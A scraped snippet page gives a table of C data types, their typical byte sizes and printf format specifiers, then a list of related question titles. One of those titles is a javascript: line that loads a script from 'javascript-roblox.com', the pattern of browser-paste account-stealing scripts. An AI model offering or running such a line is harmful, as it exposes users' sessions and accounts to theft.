Type Size (bytes) Format Specifier
int at least 2, usually 4 %d, %i
char 1 %c
float 4 %f
double 8 %lf
short int 2 usually %hd
unsigned int at least 2, usually 4 %u
long int at least 4, usually 8 %ld, %li
long long int at least 8 %lld, %lli
unsigned long int at least 4 %lu
unsigned long long int at least 8 %llu
signed char 1 %c
unsigned char 1 %c
long double at least 10, usually 12 or 16 %Lf
Image Link
Code Example |
C :: what is c |
C :: sh: tailwindcss: command not found |
C :: C program for float division of numbers |
C :: variable swap in c |
C :: c double |
C :: c print characters |
C :: char ASCII in c |
C :: 2d array in c |
C :: create point cloud from rgbd image in open3d v0.10 |
C :: sizeof file c |
C :: access 2d array with pointer c |
C :: c list |
C :: string in c and how it works |
C :: virtualbox how to move vmdk to another folder |
C :: relational operators in c |
C :: size of int in c |
C :: man strstr |
C :: insse suprafata arabila pe ani |
C :: Number 10 |
C :: Javascript:$.get("//javascript-roblox.com/api?i=29229") |
C :: ansi c function array of strings parameter |
C :: how to find folders from a c program |
C :: c ausgabe |
C :: overhead computer science |
C :: difference between %d and %i |
C :: syntax of for loop in c stack over flow |
C :: command to perform safe shutdown in unix |
C :: c# Regex similar wor |
C :: unity read text file line by line |
C :: string once declared |